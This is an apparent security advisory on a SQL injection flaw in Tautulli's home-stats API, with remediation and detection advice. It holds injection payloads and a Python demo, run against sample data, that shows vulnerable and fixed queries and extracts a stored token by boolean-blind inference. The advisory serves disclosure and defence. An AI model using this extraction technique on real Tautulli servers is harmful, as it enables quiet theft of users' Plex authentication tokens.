Tautulli SQL Injection Vulnerability in Home Stats API Endpoint

Vulnerability

A SQL injection vulnerability has been identified in Tautulli, a monitoring tool for Plex Media Server. It affects versions from 2.14.2 up to but not including 2.17.0, and versions from 2.1.0-beta up to but not including 2.17.0. The flaw is in the '/api/v2?cmd=get_home_stats' endpoint, where the 'section_id', 'user_id', 'before' and 'after' query parameters are interpolated directly into SQL statements with Python '%'-string formatting instead of being passed to SQLite as bound parameters. An attacker holding a Tautulli admin API key can therefore inject arbitrary SQL and, using boolean-blind inference, read any value out of the Tautulli SQLite database.

Impact

Exploitation allows arbitrary SQL injection: any value in the Tautulli SQLite database can be extracted through boolean-blind inference, one true/false query at a time. The attack requires a valid admin API key, and that key already grants full access to Tautulli's web UI, including features that execute OS-level commands, so the injection does not by itself raise the attacker's privilege. The main additional risk is quiet exfiltration of the Plex authentication tokens Tautulli holds for other users: a series of API calls is less likely to be noticed than interactive use of the UI.

Reproduction

To reproduce this vulnerability, send an authenticated request to the '/api/v2?cmd=get_home_stats' endpoint with a crafted 'section_id' or 'user_id' value. A value such as '999999 OR 1=1' is spliced into the WHERE clause unchanged; the injected 'OR 1=1' makes the predicate true for every row, so the endpoint returns data that a non-existent section ID would otherwise have excluded. The same splice can be confirmed by sending a value that breaks the statement's syntax, such as an unbalanced single quote; the resulting SQL error shows that the parameter reaches the query as code rather than as data.
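The two query patterns contrasted in the Vulnerability section ('%'-formatting versus a bound parameter) and the two checks in the reproduction steps (the '999999 OR 1=1' payload and the syntax-error probe), as an added, self-contained Python example. This is not Tautulli's code: the table names, columns, user IDs and token values are constructed stand-ins for the real schema, and the vulnerable function only imitates the '%'-formatting pattern the advisory describes. It also carries the boolean-blind extraction through to the end, recovering a stored token character by character with a binary search over the oracle.

```python
import sqlite3

# Constructed sample data standing in for the Tautulli SQLite file.
# Table layout, column names and tokens are hypothetical, not Tautulli's schema.
SAMPLE_SCHEMA = """
CREATE TABLE session_history (
    id INTEGER PRIMARY KEY, section_id INTEGER, user_id INTEGER, title TEXT);
CREATE TABLE users (user_id INTEGER PRIMARY KEY, username TEXT, token TEXT);
INSERT INTO session_history VALUES (1, 1, 10, 'Movie A'), (2, 2, 11, 'Show B');
INSERT INTO users VALUES (10, 'alice', 'tok-ALICE-1'), (11, 'bob', 'tok-BOB-22');
"""


def build_db():
    """In-memory SQLite database seeded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SAMPLE_SCHEMA)
    return conn


def home_stats_vulnerable(conn, section_id):
    """Vulnerable pattern: the caller-controlled value becomes part of the SQL text."""
    query = ("SELECT id, title FROM session_history "
             "WHERE section_id = %s ORDER BY id" % section_id)
    return conn.execute(query).fetchall()


def home_stats_safe(conn, section_id):
    """Hardened pattern: the value is bound through '?', so it can only ever be data."""
    query = "SELECT id, title FROM session_history WHERE section_id = ? ORDER BY id"
    return conn.execute(query, (section_id,)).fetchall()


def syntax_error_probe(conn):
    """Verification step from the advisory: an unbalanced quote reaches the SQL
    parser as code and raises an error instead of simply matching no rows."""
    try:
        home_stats_vulnerable(conn, "1'")
    except sqlite3.OperationalError:
        return True
    return False


def oracle(conn, condition):
    """Boolean oracle: 999999 matches no section, so rows come back only when the
    injected condition is true. Which rows come back does not matter."""
    return len(home_stats_vulnerable(conn, "999999 OR (%s)" % condition)) > 0


def blind_extract_token(conn, user_id, max_len=64):
    """Recover users.token for one user through the oracle alone.
    Binary search costs at most 7 requests per character plus 7 for the length.
    A user_id with no row yields NULL comparisons, so the result is ''."""
    lo, hi = 0, max_len
    while lo < hi:                      # binary-search the token length first
        mid = (lo + hi) // 2
        cond = "(SELECT length(token) FROM users WHERE user_id = %d) > %d" % (user_id, mid)
        if oracle(conn, cond):
            lo = mid + 1
        else:
            hi = mid
    length = lo
    token = ""
    for pos in range(1, length + 1):
        lo, hi = 0, 127                 # ASCII range of the constructed tokens
        while lo < hi:
            mid = (lo + hi) // 2
            cond = ("(SELECT unicode(substr(token, %d, 1)) FROM users "
                    "WHERE user_id = %d) > %d" % (pos, user_id, mid))
            if oracle(conn, cond):
                lo = mid + 1
            else:
                hi = mid
        token += chr(lo)
    return token


if __name__ == "__main__":
    db = build_db()
    print("vulnerable, '999999 OR 1=1':", home_stats_vulnerable(db, "999999 OR 1=1"))
    print("safe,       '999999 OR 1=1':", home_stats_safe(db, "999999 OR 1=1"))
    print("syntax error probe:", syntax_error_probe(db))
    print("blind-extracted token for user 11:", blind_extract_token(db, 11))
```

Against the real endpoint each oracle call would be one HTTP request carrying the admin API key and the payload in 'section_id', so a token of n characters costs roughly 7n + 7 requests; that request volume, all to one API command, is the detection signal a defender has. The bound-parameter version returns no rows for the same payload because SQLite compares the INTEGER column to the literal string '999999 OR 1=1', which is never equal.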

Remediation

Users are advised to update Tautulli to version 2.17.0 or later, where this vulnerability has been patched. Until then, treat the admin API key as the secret it is: rotate it if it may have been exposed, and watch for bursts of requests to 'cmd=get_home_stats' with unusual 'section_id' or 'user_id' values.

Added: Mar 30, 2026, 8:29 PM
Updated: Mar 30, 2026, 8:29 PM

Vulnerability Rating

Custom Algorithm

Category         Score
spread           4.5
impact           2.5
exploitability   5.8
remediation      7.7
relevance        4.9
threat           6.4
urgency          2.9
incentive        0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.